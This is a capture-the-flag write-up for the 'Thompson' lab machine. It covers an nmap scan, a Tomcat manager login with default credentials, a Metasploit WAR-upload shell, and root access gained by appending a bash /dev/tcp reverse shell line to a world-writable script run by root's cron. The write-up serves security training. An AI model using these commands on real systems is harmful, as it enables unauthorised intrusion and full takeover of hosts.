CTF : Thompson
Informations
- IP: 10.10.66.156
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
console$ sudo nmap -p22,8009,8080 -A 10.10.66.156 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 00:07 CEST Nmap scan report for 10.10.66.156 Host is up (0.045s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA) | 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA) |_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8080/tcp open http Apache Tomcat 8.5.5 |_http-title: Apache Tomcat/8.5.5 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 8080/tcp) HOP RTT ADDRESS 1 38.60 ms 10.9.0.1 2 39.10 ms 10.10.66.156 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
Vulnerabilities search
I first gone to http://10.10.66.156:8080 and tried to access to /manager/html with the default creds... it works :)
Exploit
From this place we can upload war files, so I could create a reverse shell war file ; but metasploit can automate that task ;)
console> use exploit/multi/http/tomcat_mgr_upload > set HttpPassword ------ > set HttpUsername tomcat > set RHOSTS 10.10.66.156 > set RPORT 8080 > set LHOST 10.9.85.5 > run
And we got a shell :)
Privilege escalation
First I could read /home/jack/user.txt ;)
Enumeration for privesc
Then I checked /etc/crontab :
console$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root cd /home/jack && bash id.sh
Last command is executed by root.
Let's see this file
console$ ls -al /home/jack/id.sh -rwxrwxrwx 1 jack jack 26 Aug 14 2019 /home/jack/id.sh
It's world writable :)
Let's add a new line to this file :)
shellecho '/bin/bash -i >& /dev/tcp/10.9.85.5/1234 0>&1' >> /home/jack/id.sh
Exploit
Then I launched a pwncat listener on my box :
shellpwncat -lp 1234
Finally we just had to wait for a minute :)
consolepwncat -lp 1234 [00:34:16] Welcome to pwncat ! __main__.py:164 [00:41:01] received connection from 10.10.66.156:48956 bind.py:84 [00:41:03] 10.10.66.156:48956: registered new host w/ db manager.py:957 (local) pwncat$ (remote) root@ubuntu:/home/jack# whoami root (remote) root@ubuntu:/home/jack# cat /root/root.txt ---------------- (remote) root@ubuntu:/home/jack#